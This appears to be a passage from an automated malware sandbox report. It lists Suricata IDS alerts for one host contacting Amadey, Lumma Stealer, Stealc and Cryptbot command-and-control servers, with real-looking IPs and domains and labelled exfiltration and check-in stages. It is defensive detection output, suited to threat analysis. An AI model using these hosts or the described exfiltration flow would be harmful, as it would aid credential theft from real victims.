Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49785 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49802 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.4:57173 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49806 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49814 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49822 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49824 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49832 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49837 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49858 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49866 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49875 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49865 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49843 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49890 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49907 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49906 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49925 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49945 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49942 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49960 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49974 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49978 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49991 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49997 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50005 -> 185.121.15.192:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50011 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50016 -> 185.121.15.192:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50024 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50025 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:61253 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:65072 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50060 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:53998 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50061 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50051 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50068 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50078 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50089 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50097 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:60789 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:49839 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50120 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50125 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50134 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50129 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50121 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:50121 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:50121
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:50121 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50128 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:50121
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:50121 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50139 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50140 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50141 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50153 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50157 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50162 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50158 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50168 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50169 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50171 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50177 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:64282 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:52072 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50180 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50174 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50181 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50189 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50186 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50222 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50223 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50191
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50124 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50144 -> 185.121.15.192:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50238 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50165 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50246 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50252 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50253 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50233 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50269 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50276 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50287 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50288 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50302 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50295 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50306 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50339 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50358 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50325 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50366 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50386 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50372 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50357 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50412 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50402 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50406 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50416 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50447 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50451 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50428 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50460 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50455 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50476 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50435 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50472 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50489 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50498 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50504 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50501 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50508 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.4:56639 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50500 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50509 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50505
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50517 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50527 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50526 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50528 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50497
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50533 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50496 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50521 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50547 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50541 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50520 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50523 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50542 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50572 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50567 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50568
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50544 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50608 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50610 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50605
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50595 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50580 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50604 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50562 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50623 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50558 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50637 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50642 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50617 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50665 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50584 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50669 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50673 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50571 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50681 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50650 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50598 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50677 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50685 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50646 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50654 -> 212.193.31.8:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49814 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49814 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49823 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49823 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49831 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49831 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49822 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49806 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49806 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49875 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49852 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49897 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50060 -> 104.21.21.99:443
